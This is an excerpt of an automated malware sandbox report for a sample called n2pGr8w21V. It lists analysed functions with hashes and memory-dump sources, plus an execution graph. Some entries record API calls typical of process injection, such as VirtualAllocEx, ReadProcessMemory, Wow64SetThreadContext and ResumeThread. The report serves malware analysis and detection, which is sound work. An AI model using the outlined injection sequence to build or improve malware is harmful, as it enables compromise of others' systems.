                                                              • Opcode ID: 8a2cfab7f030e57555dd271b3ded0038c86714e8bf88039814b974fe687a6699
                                                              • Instruction ID: bf228e103778abf3fceec801de328adb6fd9c52c0dfc01d8b3dcc3f5f079663f
                                                              • Opcode Fuzzy Hash: 8a2cfab7f030e57555dd271b3ded0038c86714e8bf88039814b974fe687a6699
                                                              • Instruction Fuzzy Hash: 122139B5D003499FDB10DFAAC885BEEBBF5FF48310F50842AE918A7240C7759941CBA4
                                                              Function 0736D430 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0736D4AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 249a268d241e04f8bf1d06f6666d58e4643076baadaf7a08b5086d982f14fa83
                                                              • Instruction ID: 0d54819bdf96569e26a3e4228d1cf3c673e7e792ba1221a6cec452f01164eaa0
                                                              • Opcode Fuzzy Hash: 249a268d241e04f8bf1d06f6666d58e4643076baadaf7a08b5086d982f14fa83
                                                              • Instruction Fuzzy Hash: 032138B1D003098FDB10DFAAC485BAEBBF4EF48314F54C42AD519A7240CB78A945CFA4
                                                              Function 0736DEF0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0736DF70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 93ec5ad22425596354dd0ce9ff02dc5f349b3b95c72db2147cd1886520ac4045
                                                              • Instruction ID: 649d18b061a6d0bd291c05f8609d8251368eed2bc992261990e8a4a05ccbd344
                                                              • Opcode Fuzzy Hash: 93ec5ad22425596354dd0ce9ff02dc5f349b3b95c72db2147cd1886520ac4045
                                                              • Instruction Fuzzy Hash: 022125B1D003499FDB10DFAAC885BEEBBF5FF48310F50842AE918A7240C7799901CBA4
                                                              Function 0129D810 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0129D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 0cbe1334b69d08a1f80650c5e470126862f02d4ad563206e333d3b81d79671e1
                                                              • Instruction ID: 86bbcf169c65c88f945805c5366b5b9bd08fe052d58ed1bd4b157280ea77b442
                                                              • Opcode Fuzzy Hash: 0cbe1334b69d08a1f80650c5e470126862f02d4ad563206e333d3b81d79671e1
                                                              • Instruction Fuzzy Hash: B021E4B5D002499FDB10CF9AD884ADEBBF4FB48310F14841AE918A7350D375A941CFA4
                                                              Function 0736D938 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0736D9AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 16534db660351c19ab3e82010a732c49ada092d9b5dfacbaaa8e64c8d3589da2
                                                              • Instruction ID: 0a8fe2583647ee481efdfe1469d55af1adc58baac4baa6f4b873ecec2a53f654
                                                              • Opcode Fuzzy Hash: 16534db660351c19ab3e82010a732c49ada092d9b5dfacbaaa8e64c8d3589da2
                                                              • Instruction Fuzzy Hash: 72116A75D003499FDB20DFAAC845BDEBBF5EB48320F108419E559A7240CB75A941CFA1
                                                              Function 0736D378 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 0c1d2387a4a81e81e6e483bcab49b146ce14ef58d4099e529732104b75a27d27
                                                              • Instruction ID: ca3613975d4731e3bc083aaf49fba6bf102d4d5c0d40efae6194391802b75029
                                                              • Opcode Fuzzy Hash: 0c1d2387a4a81e81e6e483bcab49b146ce14ef58d4099e529732104b75a27d27
                                                              • Instruction Fuzzy Hash: 6A1158B5D003498FDB20DFAAC445BEEFBF5EB88324F24841AD519A7640CB76A941CB94
                                                              Function 0736D940 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0736D9AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: cd0733ebaa946baa984a5e311bb1945eaf975d72fbf5ebf2218ec86297167a08
                                                              • Instruction ID: 19b427f19712be6015309e0ab01b1f038c8dc042d61e7a04a11c34c5dd74650b
                                                              • Opcode Fuzzy Hash: cd0733ebaa946baa984a5e311bb1945eaf975d72fbf5ebf2218ec86297167a08
                                                              • Instruction Fuzzy Hash: E6112675D003499FDB20DFAAC845BEEBBF5EB48324F148419E919A7250CB75A940CFA4
                                                              Function 0736D380 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 955e75b3c5f5d8cd66bdf5e14d70dc42164bd7594a3685ff044bb29f9647d0e5
                                                              • Instruction ID: d08936bd0b561b3c912fddd71f322b6c8ef782edfdc12a20bec67571e8b55322
                                                              • Opcode Fuzzy Hash: 955e75b3c5f5d8cd66bdf5e14d70dc42164bd7594a3685ff044bb29f9647d0e5
                                                              • Instruction Fuzzy Hash: 94116AB1D003498FDB20DFAAC445B9EFBF4EB88320F20841AD419A7240CB75A900CF94
                                                              Function 0129B118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0129B17E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 5f815b5b68a6e4461512f3323cefd0f86e97a6e7527917f9a43bec028b80d444
                                                              • Instruction ID: c3d6638cd067631d219598045d3e6708ce7b65b63123baa6342d7b27638c8cc5
                                                              • Opcode Fuzzy Hash: 5f815b5b68a6e4461512f3323cefd0f86e97a6e7527917f9a43bec028b80d444
                                                              • Instruction Fuzzy Hash: 3211E0B5C003498FDB20DF9AD844BDEFBF4EB88724F10842AD929A7610C379A545CFA5
                                                              Function 0123D1FC Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f58ce2826302328a9816e24bae4c0a5a27ef065e1459a91ea8204130143f637
                                                              • Instruction ID: 3cf260b186d24136836b372e2881f3546f14ac8fd14bde931d43693ff386a614
                                                              • Opcode Fuzzy Hash: 7f58ce2826302328a9816e24bae4c0a5a27ef065e1459a91ea8204130143f637
                                                              • Instruction Fuzzy Hash: 8A2106B1514208DFDB05DF94D9C4B26BB65FBC8320F60C569ED050B247C376D416CBA1
                                                              Function 0123D3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a4f60eb82734fadc8969361533eba8319149d492deb19b6d4e4eed705095b96
                                                              • Instruction ID: ce6c48592b902d0fc74d1e62adbacbee49a13c6708f83532205f3d16904c94d2
                                                              • Opcode Fuzzy Hash: 7a4f60eb82734fadc8969361533eba8319149d492deb19b6d4e4eed705095b96
                                                              • Instruction Fuzzy Hash: B92133B5624208DFDB05DF54D9C0B56BB65FBC8324F60C169EA090B246C336E856CBA2
                                                              Function 0124D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 701f06cf0b2c5fe6419c129b8d2ce1ef24500fe3b7a64dbed87e3c7ebbb2961d
                                                              • Instruction ID: da998c8c60f0b9e28b28068e6903983f600590b073d92f96ddeb809c5cb71834
                                                              • Opcode Fuzzy Hash: 701f06cf0b2c5fe6419c129b8d2ce1ef24500fe3b7a64dbed87e3c7ebbb2961d
                                                              • Instruction Fuzzy Hash: B0212571614208DFDB09DF94D9C0B15BBA1FB94324F20C66DE9094B343C376D806CA61
                                                              Function 0124D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88fe3ae48f9f890f2a29a50be7b61812b58eb97294f9e7eb509c34684f85b1c0
                                                              • Instruction ID: 1cc5bd585e54d48508d662d0bd418b4fdaa72527d887c1b8f9bc03f9f1f41375
                                                              • Opcode Fuzzy Hash: 88fe3ae48f9f890f2a29a50be7b61812b58eb97294f9e7eb509c34684f85b1c0
                                                              • Instruction Fuzzy Hash: 0F212275614308DFDB19DFA4D9C4B16BB61EB94314F20C5ADD90A0B386C37AD807CA62
                                                              Function 0124D006 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46882292fdca96f39763a1d124282a5d3e20c64440d19329412338e2ff845489
                                                              • Instruction ID: 45e51201d71abc6dfe3f2c46cf9d72583374e021a91aa78ab777210551bda3c3
                                                              • Opcode Fuzzy Hash: 46882292fdca96f39763a1d124282a5d3e20c64440d19329412338e2ff845489
                                                              • Instruction Fuzzy Hash: 3F219F755083849FCB07CF64D994B11BF71EB56314F28C5EAD9498F2A7C33A980ACB62
                                                              Function 0123D1F7 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                              • Instruction ID: 552b4aacbfd0adf570f72e7a68aab1c4f569655a5bf8936ace090f3d11119eaa
                                                              • Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                              • Instruction Fuzzy Hash: 4E21CDB6504244CFDB06CF54D9C4B16BF72FB84320F24C1AADD090A257C33AD42ACBA1
                                                              Function 0123D3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction ID: c36b49ca3d861c958e2b57521a0184a94f93cfa62c51a790670fa39414818f2a
                                                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction Fuzzy Hash: B81103B6504284CFCB06CF54D5C0B56BF72FB84324F24C2A9DA490B257C33AE456CBA1
                                                              Function 0124D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction ID: 3e45217607b605c0c9d799d9cffc6dcda16fdaa145704006240d78129ec893a0
                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction Fuzzy Hash: D811BB75504284DFDB0ACF54C5C4B15BBA2FB84324F24C6ADD9494B297C33AD40ACB61
                                                              Function 0123D731 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cc19febfa4dc33bad734592ea9f2e9a2c5befd54eb9f8c1e9f4addf5f83c1f8
                                                              • Instruction ID: f778d30180a750ed233310e2df25c60da80c28980650805d29dcb6c3456a21a1
                                                              • Opcode Fuzzy Hash: 4cc19febfa4dc33bad734592ea9f2e9a2c5befd54eb9f8c1e9f4addf5f83c1f8
                                                              • Instruction Fuzzy Hash: E601F7B15143889AE7254BA5CCC5B76BFD8DFC0225F54C51AEE080E282C2789844CAB2
                                                              Function 0123D730 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2729b7e357ef2a21c7c5b88a58163bde276aec73437003effb4dac24910de83b
                                                              • Instruction ID: 2f7a96c1f363d0f449c14f0867dd671cae021d5e6c5e51cc15b1a2efb636ece9
                                                              • Opcode Fuzzy Hash: 2729b7e357ef2a21c7c5b88a58163bde276aec73437003effb4dac24910de83b
                                                              • Instruction Fuzzy Hash: B3F0C2710443849EE7258B19CC84B66FFD8EB80334F18C55AEE080E282C2799844CA71

                                                              Non-executed Functions

                                                              Function 073496F8 Relevance: .5, Instructions: 476COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379728429.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7340000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d9a6c448dff3687a7deb6a297b73b5d44b5085e1f5566a44f24df84be8b488a
                                                              • Instruction ID: 84e34cb3b6213208f2bca1f20f2f5219319df9bccd6feab93936faea2324f6b3
                                                              • Opcode Fuzzy Hash: 2d9a6c448dff3687a7deb6a297b73b5d44b5085e1f5566a44f24df84be8b488a
                                                              • Instruction Fuzzy Hash: BD223D71A1020ADFDF15DF64C450A9EB7F5FF85300F10869AE849AB250EB71FA85CB91
                                                              Function 0736B750 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d25e8bb0bebd4bb5ab376b492deabe939c98c772f649d79abb1a1171cbf0e25
                                                              • Instruction ID: 6004211b93b4de03785fb5b6cd13c4ca5c5fc466ba6579bdc11da69518919159
                                                              • Opcode Fuzzy Hash: 7d25e8bb0bebd4bb5ab376b492deabe939c98c772f649d79abb1a1171cbf0e25
                                                              • Instruction Fuzzy Hash: 3DE1F7B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Function 0736D508 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9836cbf69f4e695802f05b78a444c569afe92656e4b883b3a21bb07b675ec1e5
                                                              • Instruction ID: 8408fde9440cd8d97b9d3c7649d444d8b43c2536296b0fa69ce5f3bdab2d5fa9
                                                              • Opcode Fuzzy Hash: 9836cbf69f4e695802f05b78a444c569afe92656e4b883b3a21bb07b675ec1e5
                                                              • Instruction Fuzzy Hash: 35E107B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Function 0736B318 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81836f515461baa10b650789e713fd423edb8fd39098d4380d59ecd359908d12
                                                              • Instruction ID: d75d206622c9f4621fe68b6b6ffb52c602d15e9e8d2ecb84f766ed910e317671
                                                              • Opcode Fuzzy Hash: 81836f515461baa10b650789e713fd423edb8fd39098d4380d59ecd359908d12
                                                              • Instruction Fuzzy Hash: 9FE1F8B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Function 0736AEE0 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dac67815c2b3cb03b32fd7cf7391f6d7fb6486722b558028554c865882b7bd53
                                                              • Instruction ID: ceee909ba8b4f8d9dc4936ea3bcee94a6d6b9f1206d1e358a359ce8781a9b241
                                                              • Opcode Fuzzy Hash: dac67815c2b3cb03b32fd7cf7391f6d7fb6486722b558028554c865882b7bd53
                                                              • Instruction Fuzzy Hash: 1DE127B4E102598FDB14DFA9C584AAEFBB2BF89300F24C169D418AB359D730AD41CF60
                                                              Function 0736BB88 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 076642115a632a021a770b63f6541b6ada669aa0958c4b14a38ce923af513b10
                                                              • Instruction ID: c1436a882e4f8174dc5595ba5c1d5d671232d5f0fbd9d12aa5110d240e36591b
                                                              • Opcode Fuzzy Hash: 076642115a632a021a770b63f6541b6ada669aa0958c4b14a38ce923af513b10
                                                              • Instruction Fuzzy Hash: CAE106B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Function 0129D584 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 438afd41953eb86c74681b15cd3ef70b1933cf3d9378af045b1f87e1fd998224
                                                              • Instruction ID: 41a490d9bb249d4d48a2c82dd0111551324bee341669f5d3f4f470533cbfe81e
                                                              • Opcode Fuzzy Hash: 438afd41953eb86c74681b15cd3ef70b1933cf3d9378af045b1f87e1fd998224
                                                              • Instruction Fuzzy Hash: D7A18F36E102068FCF19DFB8C9405AEBBB2FF85300B25416AE905EB255DB71E955CB40
                                                              Function 0736D4F8 Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daa74a68f8c4586be42dc27906d1beed43ace0629772468b8818b4a3f03b22f1
                                                              • Instruction ID: 5d946cab09b72f24395dfb99abba653ed2f3aff4ebed6ba4c8565792715c6cc3
                                                              • Opcode Fuzzy Hash: daa74a68f8c4586be42dc27906d1beed43ace0629772468b8818b4a3f03b22f1
                                                              • Instruction Fuzzy Hash: A35139B4E102198BDB14CFA9C5409AEFBF2BF89304F24C169D418AB75AD7319941CFA1
                                                              Function 0736B308 Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c53080449c6bb7b4dbef06420f5f6991de0295b5fc021a6c690d27b468c0283d
                                                              • Instruction ID: 7b73b3bd4d678cf6549f51a57f57e7febd53239d1d72744c378976a79cb7f198
                                                              • Opcode Fuzzy Hash: c53080449c6bb7b4dbef06420f5f6991de0295b5fc021a6c690d27b468c0283d
                                                              • Instruction Fuzzy Hash: C8513BB0E102298FDB15CFA9C5805AEFBB6BF89304F24C16AD418A7759D7319941CFA0

                                                              Execution Graph

                                                              Execution Coverage:1.3%
                                                              Dynamic/Decrypted Code Coverage:4.9%
                                                              Signature Coverage:4.9%
                                                              Total number of Nodes:142
                                                              Total number of Limit Nodes:9
                                                              execution_graph 90269 424e03 90270 424e1c 90269->90270 90271 424e67 90270->90271 90274 424eaa 90270->90274 90276 424eaf 90270->90276 90277 42e893 90271->90277 90275 42e893 RtlFreeHeap 90274->90275 90275->90276 90280 42cb33 90277->90280 90279 424e77 90281 42cb4d 90280->90281 90282 42cb5e RtlFreeHeap 90281->90282 90282->90279 90421 424a73 90422 424a8f 90421->90422 90423 424ab7 90422->90423 90424 424acb 90422->90424 90426 42c7c3 NtClose 90423->90426 90425 42c7c3 NtClose 90424->90425 90428 424ad4 90425->90428 90427 424ac0 90426->90427 90431 42e9b3 RtlAllocateHeap 90428->90431 90430 424adf 90431->90430 90432 42f933 90433 42f943 90432->90433 90434 42f949 90432->90434 90435 42e973 RtlAllocateHeap 90434->90435 90436 42f96f 90435->90436 90437 42bdb3 90438 42bdd0 90437->90438 90441 15d2df0 LdrInitializeThunk 90438->90441 90439 42bdf8 90441->90439 90283 41a603 90284 41a675 90283->90284 90285 41a61b 90283->90285 90285->90284 90287 41e573 90285->90287 90288 41e599 90287->90288 90292 41e696 90288->90292 90293 42fa63 90288->90293 90290 41e634 90290->90292 90299 42be03 90290->90299 90292->90284 90294 42f9d3 90293->90294 90297 42fa30 90294->90297 90303 42e973 90294->90303 90296 42fa0d 90298 42e893 RtlFreeHeap 90296->90298 90297->90290 90298->90297 90300 42be20 90299->90300 90309 15d2c0a 90300->90309 90301 42be4c 90301->90292 90306 42cae3 90303->90306 90305 42e98e 90305->90296 90307 42cb00 90306->90307 90308 42cb11 RtlAllocateHeap 90307->90308 90308->90305 90310 15d2c1f LdrInitializeThunk 90309->90310 90311 15d2c11 90309->90311 90310->90301 90311->90301 90312 413b23 90313 413b45 90312->90313 90315 42ca53 90312->90315 90316 42ca6d 90315->90316 90319 15d2c70 LdrInitializeThunk 90316->90319 90317 42ca95 90317->90313 90319->90317 90320 418ec3 90321 418ef3 90320->90321 90323 418f1f 90321->90323 90324 41b363 90321->90324 90325 41b3a7 90324->90325 90327 41b3c8 90325->90327 90328 42c7c3 90325->90328 90327->90321 90329 42c7dd 90328->90329 90330 42c7ee NtClose 90329->90330 90330->90327 90331 414124 90332 4140a8 90331->90332 90337 417853 90332->90337 90334 4140cb 90335 4140ff PostThreadMessageW 90334->90335 90336 414110 90334->90336 90335->90336 90339 417877 90337->90339 90338 41787e 90338->90334 90339->90338 90341 41789d 90339->90341 90344 42fd13 LdrLoadDll 90339->90344 90342 4178b3 LdrLoadDll 90341->90342 90343 4178ca 90341->90343 90342->90343 90343->90334 90344->90341 90345 401886 90346 401816 90345->90346 90349 42fe03 90346->90349 90352 42e443 90349->90352 90353 42e469 90352->90353 90364 407333 90353->90364 90355 42e47f 90356 4019c4 90355->90356 90367 41b173 90355->90367 90358 42e49e 90359 42e4b3 90358->90359 90382 42cb83 90358->90382 90378 428343 90359->90378 90362 42e4cd 90363 42cb83 ExitProcess 90362->90363 90363->90356 90366 407340 90364->90366 90385 416503 90364->90385 90366->90355 90368 41b19f 90367->90368 90396 41b063 